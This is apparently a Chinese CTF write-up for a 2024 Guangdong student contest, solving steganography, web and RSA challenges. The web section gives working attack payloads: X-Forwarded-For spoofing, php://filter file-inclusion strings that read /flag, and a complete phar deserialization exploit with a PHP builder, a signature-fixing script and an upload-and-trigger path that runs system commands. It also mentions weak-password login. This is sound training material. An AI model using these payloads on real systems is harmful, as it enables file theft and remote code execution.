2024广东大学生攻防大赛WP

hihopkc2024-05-132024-05-12

Misc

猜一猜

题目描述：

你们想要的flag就在压缩包里面。

压缩包文件名解密

解压密码为a1478520

然后修改flag.png文件头

得到

flag

扫描二维码之后

1	❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=

花朵解密

https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo

得到flag

1	flag{rUsJyNdKhdKuS4VfO7}

要的就在这

题目描述：

你要的在这里

misc

用010editor打开

上面那个是定积分，解出来是π

然后6是什么呢，猜测是3.1415

然后用stegpy解密

1
2
3

>python steg.py misc.png -p
Enter password (will not be echoed):
3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733dk:luckyone

3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733d
这一串十六进制转字符
5WslsqIQSBG8c6D2m5/KRwg+6gjm1tr1DQ8UyJUmIZs=

k:luckyone

flag{believe_you_are_lucky}

Web

消失的flag

题目描述：

flag就隐藏再某个文件里面，看看能不能包含出来。

访问

猜测是XFF，添加：x-forwarded-for:127.0.0.1

File is NUll

文件包含漏洞

1	?file=/flag

用另一种方法

1	?file=php://filter/read=convert.base64-encode/resource=/flag

也不行

最后试出

1	?file=php://filter/convert.iconv.utf-8.utf-7/resource=/flag

df4083ae2869462cad0d002533f6cbf7

unserialize_web

同事给我了一个反序列话的源码，在线求助！

看这篇文章有了灵感

https://blog.csdn.net/qq_53460654/article/details/121889104

https://pankas.top/2022/08/04/php(phar)反序列化漏洞及各种绕过姿势/#phar反序列化

首先扫一下目录发现/www.tar.gz

生成.phar

<?php
class File {
    public $val1;
    public $val2;
    public $val3;

    public function __construct() {
        $this->val1 = "val1";
        $this->val2 = "val2";
    }

    public function __destruct() {
        if ($this->val1 === "file" && $this->val2 === "exists") {
            if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this->val3)) {
                eval($this->val3);
            } else {
                echo "Access Denied";
            }
        }
    }

    public function __access() {
        $Var = "Access Denied";
        echo $Var;
    }

    public function __wakeup() {
        $this->val1 = "exists";
        $this->val2 = "file";
        echo "文件存在";
    }
}
$f = new File();
$f->val1 = "file";
$f->val2 = "exists";
$f->val3 = "system('cat /flag');";

$p = new Phar("File.phar", 0);
$p->startBuffering();
$p->setMetadata($f);
$p->setStub("GIF89a" . "<?php __HALT_COMPILER();" . "?>");
$p->addFromString("test.txt", "test");
$p->stopBuffering();
?>

为了绕过__wakeup()方法,3要改为4

修改签名

# -*- coding: utf-8 -*-
from hashlib import sha1
f = open('./File.phar', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('Filenew.phar', 'wb').write(newf) # 写入新文件

分析upload.php可以看到

源码ban掉了 __HALT_COMPILER(); 标识，没有这个是不认phar的，这个可以使用gzip压缩进行绕过

然后修改后缀.gif，文件上传

最后用phar 协议触发

1	phar://./upload/Filenew.phar.gif

5740619516574ce288f8f30d3f010e70

但我提交的是：f5cc52e28f364ad69c093a9a6dd1c954

flag是动态的

hackme

弱口令为admin:123456

然后显示

remote ip address is block！

抓包得到

Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE3Mi4yMC4yNDAuMzIifQ.DDtMChPMQtBA_2_wJxLPO_6g5dTaM7stY2Knngol6qAeaWh4Y8EjY6ndBLuEMhXYyecpiLFXZxEPqkV_GW3rGReg7LTCfIb4x6M6RRhotbersK1AGKKGUyVHmr0es0bHpw

改成none不行

扫目录得到/vendor

分析里面的文件

可以看到https://github.com/firebase/php-jwt

然后没思路了

mypdf

下载源码

Crypto

encipher

题目描述：

小明在学习加解密时，对输入的重要信息做了加密，但他又只是个菜鸡，对加密后的数据不会解密，很需要大哥哥们的帮助如下时小明加密后的信息：

from Crypto.Util.number import getPrime, bytes_to_long
from Crypto.Util.strxor import strxor
from Crypto.PublicKey import RSA

def decrypt(c, N, d):
    m = pow(c, d, N) #rsa_decrypt
    origin = 24#in(xor_key)
    xor_key = m.to_bytes(origin, byteorder='big')
    key = b'Life is like an ocean on'
    msg = strxor(xor_key, key)
    msg = msg.decode()
    return msg
    #message = decrypt(ciphertext, N, d)
    #print(message)

d = 4885628697024674802233453512637565599092248491488767824821990279922756927662223348312748794983451796542248787267207054348962258716585568185354414099671493917947012747791554070655258925730967322717771647407982984792632771150018212620323323635510053326184087327891569331050475507897640403090397521797022070233
N = 89714050971394259600440975863751229102748301873549839432714703551498380713981264101533375672970154214062583012365073892089644031804109941766201243163398926438698369735588338279544152140859123834763870759757751944228350552806429642516747541162527058800402619575257179607422628877017180197777983487523142664487
c = 67254133265602132458415338912590207677514059205474875492945840960242620760650527587490927820914970400738307536068560894182603885331513473363314148815933001614692570010664750071300871546575845539616570277302220914885734071483970427419582877989670767595897758329863040523037547687185382294469780732905652150451

mm=decrypt(c,N,d)
print(mm)

# flag{1s_Pa33w0rd_1y2u22}

flag{1s_Pa33w0rd_1y2u22}